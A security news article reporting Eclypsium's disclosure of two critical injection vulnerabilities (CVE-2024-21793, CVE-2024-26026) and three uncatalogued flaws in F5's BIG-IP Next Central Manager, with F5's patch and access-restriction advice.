Researchers from Eclypsium have recently disclosed details and proof of concept exploits for two critical injection vulnerabilities (CVE-2024-21793, CVE-2024-26026) that impact F5’s BIG-IP Next Central Manager.

BIG-IP Next Central Manager is a crucial component of F5’s BIG-IP devices/modules, which are widely utilized by large enterprises, including telcos, internet and cloud service providers, and government agencies, for managing and analyzing network and application traffic.

These vulnerabilities, discovered by researcher Vladyslav Babkin, pose a serious threat as they could allow malicious actors to execute arbitrary SQL statements through the BIG-IP NEXT Central Manager API. In particular, the PoC exploits shared by Eclypsium demonstrate how attackers could potentially retrieve an admin’s password hash, gaining unauthorized access to sensitive information.

In addition to the documented CVE-2024-21793 and CVE-2024-26026 vulnerabilities, Eclypsium researchers have identified three additional security flaws that have not been assigned CVE numbers. These vulnerabilities could enable attackers to create unauthorized accounts on the affected devices, easily obtain admin passwords, and reset passwords without prior knowledge of the original ones.

The researchers emphasized the severity of the situation, stating, “The management console of the Central Manager can be remotely exploited by any attacker able to access the administrative UI via CVE 2024-21793 or CVE 2024-26026. This would result in full administrative control of the manager itself.”

Furthermore, attackers could exploit the other vulnerabilities to establish new malicious accounts on any BIG-IP Next asset managed by the Central Manager, without being detected by the Central Manager interface.

F5 has promptly released patches for the injection vulnerabilities and strongly advises administrators to implement these fixes immediately. In the meantime, organizations can also mitigate the risks by restricting management access to F5 products to trusted users and devices within a secure network environment.

However, it is important to note that the status of the three additional vulnerabilities flagged by Eclypsium remains uncertain, as the researchers have not confirmed whether fixes have been implemented at this time. Fortunately, there is currently no evidence to suggest that threat actors are actively exploiting these vulnerabilities.

In conclusion, the disclosure of these critical vulnerabilities underscores the importance of timely patch management and proactive security measures to safeguard against potential cyber threats targeting enterprise infrastructure. Organizations using F5’s BIG-IP Next Central Manager are advised to stay vigilant and take necessary precautions to protect their systems from exploitation.

Lidhja e burimit